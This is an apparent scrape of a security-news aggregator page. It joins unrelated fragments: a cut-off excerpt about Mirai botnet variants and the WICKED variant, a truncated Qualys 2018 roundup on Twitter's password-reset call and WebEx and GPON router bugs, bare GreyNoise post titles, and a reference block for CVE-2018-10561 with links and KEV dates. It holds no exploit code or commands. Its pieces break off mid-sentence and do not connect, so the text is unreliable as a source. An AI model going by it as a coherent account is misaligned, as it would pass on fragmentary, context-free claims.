Some made significant modifications, such as adding the capability to turn infected devices into swarms of malware proxies and cryptominers. Others integrated Mirai code with multiple exploits targeting both known and unknown vulnerabilities, similar to a new variant recently discovered by FortiGuard Labs, which we now call WICKED.
This new variant has added at least three exploits to its arsenal to target unpatched
Qualys
Timely Password-Change Call from Twitter, as Bugs Hit WebEx and GPON routers | Qualys
blogs_qualys·2018-05-08
Timely Password-Change Call from Twitter, as Bugs Hit WebEx and GPON routers | Qualys
The cyber security news cycle is always active, so to help you stay in the loop here’s a selection of incidents that caught our attention over the past week or so involving, among others, Twitter, Cisco and GPON routers.
### Twitter picks a good day for password-change call
As “change your password” calls from vendors go, the one from Twitter last week ranks right up there, and not just because of the scope of users involved. As Jon Swartz pointed out in Barron’s, Twitter’s alert went out on Thursday, which happened to be World Password Day.
The social media juggernaut reached out to all of its 330 million users and advised them to take a moment, go to their account settings page and enter a new password. Twitter also suggested they enable Twitter’s two-step verification feature, a move
Greynoiseio
Battling Ransomware One Tag At A Time
blogs_greynoiseio
Battling Ransomware One Tag At A Time
Greynoiseio
NoiseLetter
blogs_greynoiseio
NoiseLetter
Greynoiseio
GreyNoise Intelligence Publishes Second Annual Retrospective to Help International Cybersecurity Community Defend Against Internet Exploitation
blogs_greynoiseio
GreyNoise Intelligence Publishes Second Annual Retrospective to Help International Cybersecurity Community Defend Against Internet Exploitation
References
- http://www.securityfocus.com/bid/107053
- https://www.exploit-db.com/exploits/44576/
- https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2018-10561
Published: 2018-05-04
Added to CISA KEV: 2022-03-31
Exploited in the wild